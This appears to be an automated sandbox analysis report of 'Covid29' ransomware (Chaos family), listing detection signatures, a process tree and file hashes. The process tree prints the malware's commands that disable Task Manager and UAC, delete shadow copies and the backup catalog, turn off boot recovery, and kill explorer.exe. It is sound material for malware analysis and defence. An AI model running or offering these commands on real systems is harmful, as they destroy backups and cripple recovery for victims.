Analysis

  • max time kernel
    127s
  • max time network
    131s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    23-11-2024 15:30

General

  • Target

    https://www.pinterest.com/ouchtak/gaming-setup/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 31 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.pinterest.com/ouchtak/gaming-setup/
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa300946f8,0x7ffa30094708,0x7ffa30094718
      2⤵
        PID:2332
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        2⤵
          PID:4980
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4744
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
          2⤵
            PID:4120
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
            2⤵
              PID:776
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
              2⤵
                PID:3816
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
                2⤵
                  PID:2020
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
                  2⤵
                    PID:3000
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
                    2⤵
                      PID:392
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
                      2⤵
                        PID:568
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                        2⤵
                        • Drops file in Program Files directory
                        PID:3020
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff777fc5460,0x7ff777fc5470,0x7ff777fc5480
                          3⤵
                            PID:3760
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3284
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
                          2⤵
                            PID:4972
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
                            2⤵
                              PID:2872
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
                              2⤵
                                PID:3852
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
                                2⤵
                                  PID:5040
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
                                  2⤵
                                    PID:3696
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                                    2⤵
                                      PID:3920
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
                                      2⤵
                                        PID:2428
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
                                        2⤵
                                          PID:5584
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
                                          2⤵
                                            PID:5692
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2728 /prefetch:8
                                            2⤵
                                              PID:5896
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
                                              2⤵
                                                PID:5904
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5916
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1752 /prefetch:2
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5808
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:3164
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:4548
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:2908
                                                  • C:\Users\Admin\AppData\Local\Temp\23079c6d-feba-4667-bce2-0892357e0ea7_Covid29 Ransomware.zip.ea7\TrojanRansomCovid29.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\23079c6d-feba-4667-bce2-0892357e0ea7_Covid29 Ransomware.zip.ea7\TrojanRansomCovid29.exe"
                                                    1⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5332
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C04D.tmp\TrojanRansomCovid29.bat" "
                                                      2⤵
                                                      • Checks computer location settings
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies registry class
                                                      PID:5384
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\C04D.tmp\fakeerror.vbs"
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5616
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping localhost -n 2
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:5644
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:2088
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:1260
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:2952
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:2524
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:5848
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                        3⤵
                                                        • UAC bypass
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:1092
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                        3⤵
                                                        • UAC bypass
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:5924
                                                      • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\mbr.exe
                                                        mbr.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Writes to the Master Boot Record (MBR)
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4048
                                                      • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29Cry.exe
                                                        Cov29Cry.exe
                                                        3⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6012
                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                          "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                          4⤵
                                                          • Checks computer location settings
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Drops desktop.ini file(s)
                                                          • Sets desktop wallpaper using registry
                                                          • Modifies registry class
                                                          • Suspicious behavior: AddClipboardFormatListener
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3152
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                            5⤵
                                                              PID:5228
                                                              • C:\Windows\system32\vssadmin.exe
                                                                vssadmin delete shadows /all /quiet
                                                                6⤵
                                                                • Interacts with shadow copies
                                                                PID:5840
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic shadowcopy delete
                                                                6⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3672
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                              5⤵
                                                                PID:5528
                                                                • C:\Windows\system32\bcdedit.exe
                                                                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                  6⤵
                                                                  • Modifies boot configuration data using bcdedit
                                                                  PID:5572
                                                                • C:\Windows\system32\bcdedit.exe
                                                                  bcdedit /set {default} recoveryenabled no
                                                                  6⤵
                                                                  • Modifies boot configuration data using bcdedit
                                                                  PID:3752
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                5⤵
                                                                  PID:5668
                                                                  • C:\Windows\system32\wbadmin.exe
                                                                    wbadmin delete catalog -quiet
                                                                    6⤵
                                                                    • Deletes backup catalog
                                                                    PID:2088
                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                  5⤵
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:252
                                                            • C:\Windows\SysWOW64\shutdown.exe
                                                              shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4596
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping localhost -n 9
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:6056
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im explorer.exe
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5848
                                                            • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29LockScreen.exe
                                                              Cov29LockScreen.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3312
                                                        • C:\Windows\system32\vssvc.exe
                                                          C:\Windows\system32\vssvc.exe
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5836
                                                        • C:\Windows\system32\wbengine.exe
                                                          "C:\Windows\system32\wbengine.exe"
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5888
                                                        • C:\Windows\System32\vdsldr.exe
                                                          C:\Windows\System32\vdsldr.exe -Embedding
                                                          1⤵
                                                            PID:4048
                                                          • C:\Windows\System32\vds.exe
                                                            C:\Windows\System32\vds.exe
                                                            1⤵
                                                            • Checks SCSI registry key(s)
                                                            PID:2748

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            6dda6e078b56bc17505e368f3e845302

                                                            SHA1

                                                            45fbd981fbbd4f961bf72f0ac76308fc18306cba

                                                            SHA256

                                                            591bf3493eb620a3851c0cd65bff79758a09c61e9a22ea113fa0480404a38b15

                                                            SHA512

                                                            9e460013fd043cee9bdbcdaf96ac2f7e21a08e88ddb754dddbd8378ee2288d50271e66b42092d84a12e726469465185be11a6fafab6ed4236a244524bd60f502

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            f6126b3cef466f7479c4f176528a9348

                                                            SHA1

                                                            87855913d0bfe2c4559dd3acb243d05c6d7e4908

                                                            SHA256

                                                            588138bf57e937e1dec203a5073c3edb1e921c066779e893342e79e3d160e0b4

                                                            SHA512

                                                            ef622b26c8cee1f767def355b2d7bffb2b28e7a653c09b7e2d33f6468a453fff39fd120cacbffd79ce35722592af0f3fb7d5054e2dca06310e44dc460533f3d8

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6cea5cc4-9f1c-4ade-9765-5e5987e29d27.tmp

                                                            Filesize

                                                            70KB

                                                            MD5

                                                            e5e3377341056643b0494b6842c0b544

                                                            SHA1

                                                            d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                            SHA256

                                                            e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                            SHA512

                                                            83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

                                                            Filesize

                                                            67KB

                                                            MD5

                                                            b275fa8d2d2d768231289d114f48e35f

                                                            SHA1

                                                            bb96003ff86bd9dedbd2976b1916d87ac6402073

                                                            SHA256

                                                            1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1

                                                            SHA512

                                                            d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

                                                            Filesize

                                                            366KB

                                                            MD5

                                                            e6940bda64389c1fa2ae8e1727abe131

                                                            SHA1

                                                            1568647e5acd7835321d847024df3ffdf629e547

                                                            SHA256

                                                            eef5dd06cf622fb43ea42872bc616d956de98a3335861af84d35dbaf2ab32699

                                                            SHA512

                                                            91c07e84e5188336464ae9939bfc974d26b0c55d19542527bdcd3e9cac56d8c07655dc921acaa487ed993977a22a0f128dc3c6111273273ff1f637b20bb56fb6

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

                                                            Filesize

                                                            63KB

                                                            MD5

                                                            226541550a51911c375216f718493f65

                                                            SHA1

                                                            f6e608468401f9384cabdef45ca19e2afacc84bd

                                                            SHA256

                                                            caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

                                                            SHA512

                                                            2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

                                                            Filesize

                                                            19KB

                                                            MD5

                                                            1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

                                                            SHA1

                                                            6dd8803e59949c985d6a9df2f26c833041a5178c

                                                            SHA256

                                                            af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

                                                            SHA512

                                                            b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                            Filesize

                                                            48B

                                                            MD5

                                                            acb230c6df83c412676f5ddcd338e5f3

                                                            SHA1

                                                            4f7505b62af1fb79861be66976dd21ca0246346d

                                                            SHA256

